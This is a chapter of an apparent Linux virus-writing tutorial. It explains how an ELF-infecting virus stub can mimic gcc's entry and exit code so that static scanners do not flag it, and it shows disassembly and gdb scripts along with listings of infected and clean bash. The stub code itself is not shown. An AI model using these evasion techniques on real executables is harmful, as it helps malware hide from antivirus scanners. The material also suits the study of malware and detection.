12. The stub revisited

 

A person who is more than casually interested in computers should be well schooled in machine language, since it is a fundamental part of a computer.

 Donald Knuth

The scanners Scan segment padding and Scan entry point (i) Second scan check program layout for deviations. On a typical Linux distribution this yields good results since all programs are compiled and linked with the same set of tools. But there are legitimate reasons for executables to look different. Some rescue tools and non-free executables are linked statically to be independent of the target system. [1]

asmutils is a set of miscellaneous utilities written in assembly language, targeted on embedded systems and small distributions (e.g. installation or rescue disks); also it contains a small libc and a crypto library. It features the smallest possible size and memory requirements, the fastest speed, and offers fairly good functionality.

The next best approach is to follow the flow of control and verify visited code, starting from the entry point. Again this relies on a certain homogeneity of executables.

  1. A very simple check is alignment. We handle that in target_copy_and_infect and and Section 10.6. gcc(1) never starts functions on odd addresses. But neither VIT nor RST seem to care and put the infection after the last byte of the code segment.

  2. The improved versions of patchEntryAddr in The entry point do a primitive check of the call to __libc_start_main. Since we leave the entry point unmodified we pass this test.

  3. The next step is to check entry code of functions called by __libc_start_main, especially main. We are vulnerable to this.

12.1. Disassembly

Section 9.5 patches the call of __libc_start_main to invoke our virus code instead of main. To stay undetected our code should mimic the real thing. The disassembly of our first program shows everything we need to know. But then that listing was retrieved through heavy cheating.

To disassembly the main of a regular executable we extend the exercise of Disassemble it again, Sam. The script performs no kind of error checking. Feeding anything else than executables built by gcc(1) can have strange effects (like no output at all). There is also no limit on output length. In the examples below the Makefile building this document used head(1).

Command: pre/i386-redhat7.3-linux/stub_revisited/intel.sh
#!/bin/bash
file=${1:-/bin/bash}
entry_point=$( /usr/bin/od -j24 -An -td4 -N4 ${file} )

# 134512640 = 0x8048000
# 24 = offset to address of main in code of _start
main_point_ofs=$( expr ${entry_point} - 134512640 + 24 )
main=$( /usr/bin/od -j${main_point_ofs} -An -td4 -N4 ${file} )
main_ofs=$( expr ${main} - 134512640 )

ndisasm -e ${main_ofs} -o ${main} -U ${file}

First a simple test. Compare with above mentioned disassembly.

Output: out/i386-redhat7.3-linux/stub_revisited/magic_elf.disasm
08048400  55                push ebp
08048401  89E5              mov ebp,esp
08048403  83EC0C            sub esp,byte +0xc
08048406  6A03              push byte +0x3
08048408  6801800408        push dword 0x8048001
0804840D  6A01              push byte +0x1
0804840F  E8BCFEFFFF        call 0x80482d0
08048414  B800000000        mov eax,0x0
08048419  C9                leave
0804841A  C3                ret

A look at tmp/doing_it_in_c/e3/sh_infected.

Output: out/i386-redhat7.3-linux/stub_revisited/bash_infected.disasm
080C6420  6840950508        push dword 0x8059540
080C6425  9C                pushf
080C6426  60                pusha
080C6427  E804000000        call 0x80c6430
080C642C  61                popa
080C642D  9D                popf
080C642E  C3                ret
080C642F  90                nop
080C6430  55                push ebp
080C6431  89E5              mov ebp,esp
080C6433  57                push edi

And this is plain /bin/bash.

Output: out/i386-redhat7.3-linux/stub_revisited/sh.disasm
08059540  55                push ebp
08059541  89E5              mov ebp,esp
08059543  57                push edi
08059544  56                push esi
08059545  53                push ebx
08059546  83EC24            sub esp,byte +0x24
08059549  8B4508            mov eax,[ebp+0x8]
0805954C  6A01              push byte +0x1
0805954E  68600B0D08        push dword 0x80d0b60
08059553  8945E4            mov [ebp-0x1c],eax

The first two instructions, making up three bytes, are constant. They are followed by an optional series of push to save special registers. Then comes a sub esp to reserve space for local variables. This also seems to be constant. The trivial program in The magic of the Elf does not use local variables and still ends up with a sub.

For the exit code of /bin/bash we need a better filter.

Command: pre/i386-redhat7.3-linux/stub_revisited/intel_ret.sh
#!/bin/bash
( pre/i386-redhat7.3-linux/stub_revisited/intel.sh "$@" 2>&1 ) \
| /bin/sed /ret/q \
| /usr/bin/tail

Output: out/i386-redhat7.3-linux/stub_revisited/sh_ret.disasm
08059D96  7409              jz 0x8059da1
08059D98  80382D            cmp byte [eax],0x2d
08059D9B  0F84C4FEFFFF      jz near 0x8059c65
08059DA1  8B45F0            mov eax,[ebp-0x10]
08059DA4  8D65F4            lea esp,[ebp-0xc]
08059DA7  5B                pop ebx
08059DA8  5E                pop esi
08059DA9  5F                pop edi
08059DAA  5D                pop ebp
08059DAB  C3                ret

I call this weird. It seems that 0xc byte are reserved on the stack just to stay unused. And why does one program use leave and the other pop ebp? A quote from the documentation [2] of nasm [3] :

LEAVE                         ; C9                   [186]

LEAVE destroys a stack frame of the form created by the ENTER instruction
[4] It is functionally equivalent to MOV ESP,EBP followed by POP EBP.

I guess that we are safe on that front. It's easy to check the existence of fixed byte values at a certain location (the entry code). But I doubt whether a static scanner could really realize whether a given exit code is just a dummy. Or what instruction a ret effectively jumps to.

12.2. Stack dump

Let's examine the stack of In the language of mortals just after the sub was executed. Note that you don't have to quote character "$" in interactive gdb(1) sessions. Instead of "\$sp" you type plain "$sp" to reference the stack pointer.

Command: pre/i386-redhat7.3-linux/stub_revisited/stack.sh
#!/bin/bash
file=${1:-tmp/i386-redhat7.3-linux/magic_elf/magic_elf}
/usr/bin/gdb ${file} -q <<EOT
	break main
	run
	backtrace
	printf "esp=%08x ebp=%08x\n", \$esp, \$ebp
	x/3xw \$sp
	x/3xw \$sp + 12
	x/3xw \$sp + 24
	x/3xw \$sp + 36
EOT

Output: out/i386-redhat7.3-linux/stub_revisited/stack
(gdb) Breakpoint 1 at 0x8048406
(gdb) Starting program: /home/alba/virus-writing-HOWTO/tmp/i386-redhat7.3-linux/magic_elf/magic_elf 

Breakpoint 1, 0x08048406 in main ()
(gdb) #0  0x08048406 in main ()
#1  0x42017589 in __libc_start_main () from /lib/i686/libc.so.6
(gdb) esp=bffff99c ebp=bffff9a8
(gdb) 0xbffff99c:	0x080483e1	0x08049498	0x08049594
(gdb) 0xbffff9a8:	0xbffff9e8	0x42017589	0x00000001
(gdb) 0xbffff9b4:	0xbffffa14	0xbffffa1c	0x080482ae
(gdb) 0xbffff9c0:	0x08048460	0x00000000	0xbffff9e8
(gdb) 

12.3. Another look at the source

The program was stopped at address 0x8048406 in function main, which was called from __libc_start_main. We already encountered file

Looks plausible.

12.4. A few bytes on the stack

The new stub must fulfill a few constraints.

12.5. First implementation

If we keep original exit code then we must modify the stack. The simplest approach is to move the original ebp one position (4 bytes) down. Original entry code already reserved 12 unused bytes so we don't have to adjust esp. In the free space we store the address of host code.

The following disassembly shows stub and the first function of the C part, called body. The stub ends with a few nop instructions to align its size. Flow of control just continues from stub to body. Since this is a regular C function it also has standard entry code. But this does not matter because standard exit code starts with a leave. No matter how much stuff was pushed on the stack between end of stub and exit code of body, the leave instruction will pop off the moved ebp. The following ret then jumps to host code.

12.6. First test

12.7. Second implementation

This is the same idea, only obfuscated by an intermediate call. Variations on this topic are endless.

12.8. Second test

Notes

[1]

http://linuxassembly.org/asmutils.html

[2]

http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.94

[3]

http://sourceforge.net/projects/nasm/

[4]

http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.27